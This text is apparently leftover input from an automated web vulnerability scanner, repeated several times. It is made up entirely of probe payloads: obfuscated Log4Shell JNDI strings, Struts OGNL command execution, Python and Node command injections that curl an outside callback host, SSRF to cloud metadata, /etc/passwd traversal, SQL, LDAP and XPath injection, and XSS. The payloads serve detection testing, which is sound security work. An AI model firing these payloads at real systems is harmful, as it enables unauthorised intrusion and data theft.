${jndi:dns://4b31e046ea6defc6e0d8c632f5025d77c0efc2b4.17527257393642422.1079188473.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//eae20d1b02d9a80857640b05d21dd99a1491ea36.17527257393642422.3158632436.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://e233ff0f627b95e0dfe1d014fcc701836555c3b2.17527257393642422.977801049.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//aba5b3da7b9cb97addf8c39ba6c8bec943d4a33d.17527257393642422.2606861091.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://8900676d7e8a370fadfe519621e6865f92d290df.17527257393642422.733346713.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://aec889cb87fe69645fdb75d0dd60ad890b6f0da0.17527257393642422.342798923.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://34ebd4e3fdca5f6c3e0de9d1fec6309cf5b3cfe7.17527257393642422.1436602174.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://c8220ee976fb07e26598cda8b479f941e70292a2.17527257393642422.270116185.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
195bca727c75bfcd83c76844acf103d836bea596.17527257393642422.2087099316.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://ab6040fdbfd9156d6911bff8f6c3929066ba8917.17527257393642422.45696248.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@2eff8868ad1fdb57ea7df1ff8149b45eefe0de9a.17527257393642422.2617321377.smtphi01.smtp.eu2.qualysperiscope.com.
1)(|(uidNumber=*)
1
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1)(|(objectclass=*)
1
1
1*
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1
1)(attribute2=*)
QualysWAS${150797*150797}QualysWAS
1
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxss71W2k18n};
1
qualyswas:
1
(23.0231*213.759)
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxssKo46U5R8()-"
1
'-qxssBN26z6SN()-'
1
*/;(function(){qxssx6S4fYO8});/*
1
9 ;(function(){qxsshS8CctJ2});//
1
9;(function(){qxssXxzeU7BV});//
1
';(function(){qxss2ZvZ2w9D});/**/'
qualys(aqxsso3G4K8Ti)xyz
1
1
");(function(){qxssPPPr55Hr});/**/"
1
";(function(){qxssM1EMcEHw});/**/"
1
javascript:qxss(X2983352796Y1_2Z);
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
1
,
1
``
1
/*
1
#
;--
1
1
1'
1
qualyswasesi
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
111222
1
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
< script a=4>qssS2pqL6oH=7< /script>
1
" onEvent=X2983352796Y1_2Z
1
' onEvent=X2983352796Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qss9ODhlOgl=7")}
1
1">
1
1
1
"'>
1
1
1
1
1 _q_q=random(8E8501UD)
1
_q=random(X2983352796Y1_2Z)
1
_q=random(X2983352796Y1_2Z)
1
"'>
1
z-->
1
1"'>
1
">
1
javascript:qxss(X2983352796Y1_2Z);
1
" onEvent=X2983352796Y1_2Z
1
' onEvent=X2983352796Y1_2Z
1
_q=random(X2983352796Y1_2Z)
1
"'>
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
require('child_process').execSync('sleep 29').toString()
1
__import__('os').popen('sleep 29').read()
1
1' + sleep(29*100*Math.sqrt(100)) + '
1
1'; var djci=sleep(29*1000) + '
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1;SELECT sleep(29); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1" or true() or "and" = "and
1 or not(false()) or 'true' = 'true'
1
1
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1
1' or not(false()) or 'true' = 'true
1
1
1' and false() and 'or' = 'and
1' or true() or 'and' = 'and
1
1
15 oR 9=8 + 1
1
11 or 11=12
11 or 11=11
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1
1' and 'tpklq'='xqlkp
1
1' or 'tpklq'='tpklq
1
1
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1') and 'swqtp'='ptqws
1') or 'swqtp'='swqtp
1 aND 7248=2491 + 4757
1
1
1 and 7248 IS NULL
1
1 and NULL IS NULL
1
1 oR 6248=2491 + 3757
1
1 or 6248 IS NULL
1
1
1 or NULL IS NULL
1
1
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1 and 4325=2728 --
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1 or 4325=4325 --
1
1' and 3789=1391 --
1' or 3789=3789 --
1
1
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1
1') and 2634=1123 --
1') or 2634=2634 --
1
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl a06abbaf9a252ffe19653904cd33657cb37952dd.17489408393642422.1679327225.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget d1df02655cd1dbb30ccece7720b86cf18cdc0f86.17489408393642422.711138021.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl c1cc72d81d1ee960b4c7c85643002a26ea64a05b.17489408393642422.640359559.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl e9d9bccd58967bc4a13067bf18d6485565eab982.17489408393642422.1513415032.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 2ddc01f1f1d16a055b1494c08e65a747175eaf70.17489408393642422.2140243087.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","e84f1a5ec462838a25b20d4d6e57fcbaa2deffe5.17489408393642422.1189540108.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://b54dd77c9e137cde8324abcd65689019544efa09.17489408393642422.3499602515.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://518528d576bf77ecfe6980760e880f90a3f823f2.17489408393642422.4132688124.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//a1c382a133c176288b4f35d03c18c86fe7d4b89e.17489408393642422.2573489038.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://38b4319da5eba7a22e9bee82eb18386de7e13b63.17489408393642422.766044023.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//2eb4b6ad5bfb4e26acb32fb2e0672435959978ee.17489408393642422.881543170.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://6c5aedd3d8e85e0943a020a666a9b405324a66ba.17489408393642422.2494663301.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//f886d8f6a9e0517bfd6b47f2553a2b980c6d9c09.17489408393642422.2339411690.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://ceafc47d44f39d4aa1ee507cf4a4080c911b42cb.17489408393642422.3007172570.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://637d47d1ca375b6777aab80161efb9af9430b4a6.17489408393642422.2225187692.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://f16647587718927230bc92222fcc8e84f2bacbd9.17489408393642422.3451835618.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://0092018383017c6b61bc79fced01fd3a1b6d0137.17489408393642422.3350869479.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
1b1d50470d3900125222b3f0ec08ee3fbb26a295.17489408393642422.1461878826.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://562db3f01d62b73eaa7243eff0912b9159616e29.17489408393642422.1085201497.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@d2b7261ac8bfd2aabe021b8d954db459432fb249.17489408393642422.2171816437.smtphi01.smtp.eu2.qualysperiscope.com.
1)(|(uidNumber=*)
1
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1
1)(attribute2=*)
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxss6t3gnos8};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxssh6GF39HD()-"
1
'-qxss9V6P4N50()-'
1
*/;(function(){qxssg46Z44Xz});/*
1
9 ;(function(){qxssF61xB3c8});//
1
9;(function(){qxssi0g5QHO6});//
1
';(function(){qxssPrVivBe6});/**/'
1
qualys(aqxss85D79u97)xyz
1
");(function(){qxss46tyZK51});/**/"
1
";(function(){qxssJ86CEIqh});/**/"
1
javascript:qxss(X168901084Y1_2Z);
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
1
....//....//....//....//....//....//etc/passwd
php://filter/read=string.rot13/resource=/etc/passwd
1
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
1
,
1
``
1
/*
1
#
1
;--
1
1'
1
qualyswasesi
1
q Qualys_resp_hdr_injection: Vulnerable
q Qualys_resp_hdr_injection: Vulnerable
1
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
1
111222
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
< script a=4>qssIOTB4Yn5=7< /script>
1
" onEvent=X168901084Y1_2Z
1
' onEvent=X168901084Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qss5vH0Joq7=7")}
1">
1
1
1
1
"'>
1
1
1
1
1 _q_q=random(53F2RV0P)
1
_q=random(X168901084Y1_2Z)
1
_q=random(X168901084Y1_2Z)
1
"'>
1
z-->
1
1"'>
1
">
1
javascript:qxss(X168901084Y1_2Z);
1
" onEvent=X168901084Y1_2Z
1
' onEvent=X168901084Y1_2Z
1
_q=random(X168901084Y1_2Z)
1
"'>
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
require('child_process').execSync('sleep 29').toString()
__import__('os').popen('sleep 29').read()
1
1
1' + sleep(29*100*Math.sqrt(100)) + '
1
1'; var djci=sleep(29*1000) + '
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1;SELECT sleep(29); --
1
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1WAITFOR DELAY '00:00:29'
1
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1" or true() or "and" = "and
1
1 or not(false()) or 'true' = 'true'
1
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1
1
1
1' or not(false()) or 'true' = 'true
1' and false() and 'or' = 'and
1' or true() or 'and' = 'and
1
15 oR 9=8 + 1
1
1
11 or 11=12
11 or 11=11
1
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1' and 'tpklq'='xqlkp
1
1' or 'tpklq'='tpklq
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1
1') and 'swqtp'='ptqws
1') or 'swqtp'='swqtp
1
1 aND 7248=2491 + 4757
1
1
1 and 7248 IS NULL
1 and NULL IS NULL
1
1 oR 6248=2491 + 3757
1
1
1 or 6248 IS NULL
1 or NULL IS NULL
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1
1 and 4325=2728 --
1 or 4325=4325 --
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1
1
1' and 3789=1391 --
1' or 3789=3789 --
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1
1') and 2634=1123 --
1
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl df59a81d296675c201b3de9479d13ed187c0bfde.17463223393642422.1206342543.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget 7ad793b093b5356aada2f5bbf26690c08f3e35eb.17463223393642422.384957536.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl eec865b242fa1ced2f01ee81cdb29400a121f777.17463223393642422.1035534120.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 69f5c3fe7de85b9edc71055a1f61d48cb89ad15f.17463223393642422.1395707547.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 7f518a003cd34a53a7bbaa826b93ac4bbd31181e.17463223393642422.308012381.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","50cc28812f3a68580cd688ec064d449499266198.17463223393642422.4242392671.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://af238b67f2f61209ad403388ce88ccb9887b8d93.17463223393642422.2020148716.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://8e90f1be329acad410ff7d3682da1494670041fd.17463223393642422.3320965075.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//b313891e9ac9e17691e2289f5d4d9e52c1a1aff1.17463223393642422.892339453.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://a7b23f407157e16a641db8cdf352507de0eee482.17463223393642422.907501783.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//9c2f99c9fa142e15959ca8e406abf2cb947e35ec.17463223393642422.2621968304.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://d87e76bb1f71c2b77585469527cbd76f062384ae.17463223393642422.2971123215.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//93a2b6bd3137afa1c56550fefc1e0dd41b5d5a08.17463223393642422.2966250981.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://4d04a4bd9c589b1342af2dddf2eacd96bd459ac6.17463223393642422.2355053021.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://7a1775b6406e761ad7b0fd1e98d08c651deaab98.17463223393642422.1869637231.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://931318c5de9a99a36f3c7ff877008830bfd46b74.17463223393642422.2773071529.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://9c88e305534f6742b105559d22cf40f9d2a995b1.17463223393642422.1769349733.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
ffdc4f9295b4d21574676d66d0fcea11aa147839.17463223393642422.1897249434.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://cfa382dfdb4f2e401f6b5e9b0989b05d4cfdafc2.17463223393642422.997190.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@3b8996bd20096420279a4dc30f330ffdf2fff9ac.17463223393642422.3995180765.smtphi01.smtp.eu2.qualysperiscope.com.
1
1)(|(uidNumber=*)
1)(|(gidNumber=*)
1
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1*(|(objectclass=*))
1
1
1)(uid=*))(|(uid=*
1
1)(attribute2=*)
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxss966NPFIc};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxssnQ89fXJ8()-"
1
'-qxssFnlK52F0()-'
1
*/;(function(){qxssAtW9R6FT});/*
1
9 ;(function(){qxssIl4qk3Fr});//
1
9;(function(){qxssYHw3sCRN});//
1
';(function(){qxss6JVOJWp7});/**/'
1
qualys(aqxss7DtSc3ft)xyz
1
");(function(){qxssZO3c2RNV});/**/"
1
";(function(){qxss62ATi9U6});/**/"
1
javascript:qxss(X161733060Y1_2Z);
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
